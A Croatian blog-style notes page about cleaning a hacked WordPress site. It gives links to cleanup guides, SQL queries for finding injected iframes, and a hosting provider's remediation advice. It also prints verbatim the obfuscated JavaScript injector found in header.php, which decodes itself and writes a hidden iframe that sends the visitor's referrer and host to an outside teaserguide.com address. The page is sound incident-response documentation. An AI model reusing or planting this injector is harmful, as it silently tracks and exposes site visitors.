13 lis.

Borba sa virusima

http://www.optimizesmart.com/malware-removal-checklist-for-wordpress-diy-security-guide/

Anti-Malware and Brute-Force Security by ELI https://wordpress.org/plugins/gotmls/

http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

https://wplearninglab.com/how-to-find-a-backdoor-in-a-hacked-wordpress-site-and-close-it/

QUERIES ZA PRETRAŽIVANJE BAZE

SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'

 

16 ruj.

Teaserguide virus u header.php

Na početku body taga je bio neki kod i  iframe linking to http://c11n4.i.teaserguide.com/snitch?…

U header.php je bio dodan ovaj kod

<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
 <script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
 

O Teaserguide virusu na webu

https://wordpress.org/support/topic/virus-not-found-in-wordfence

http://sntjohnny.com/front/the-teaserguide-wordpress-hack/2683.html

https://wordpress.org/support/topic/teaserguide-virus-in-headerphp-not-found

Ova koje to izgledalo  na jednoj stranici:

error-header4

Što su odgovorili u WebHostingBuzzu

Hello,

We have scanned your public_html directory via our antivirus software and it didn’t detect any malware.
We are afraid we can’t provide you with the exact reason why your account was hacked. We have no log records which point to this.
Most likely, one of your account passwords was compromised or hackers utilized the vulnerability of your WP or its add-ons. In order to prevent this in future you should perform the following steps:
1. Scan your local environment by running a full anti-virus/malware scan on your local machine.
2. Reset your passwords for WordPress admin area and do not keep your passwords in your browser or FTP client in a plain text.
3. Keep regular backups of your sites.
4. Update all your scripts to the latest stable and secure versions.
As you are using WordPress for your site, please have a look at more recommendations from WP developers at the following link:
http://codex.wordpress.org/FAQ_My_site_was_hacked.
http://docs.wordfence.com/en/How_do_I_clean_my_hacked_site_using_Wordfence%3F

For fixing your header.php file, it is best to replace it with a backup copy, or click the link to have Wordfence replace it with the original (if it is a theme from wordpress.org).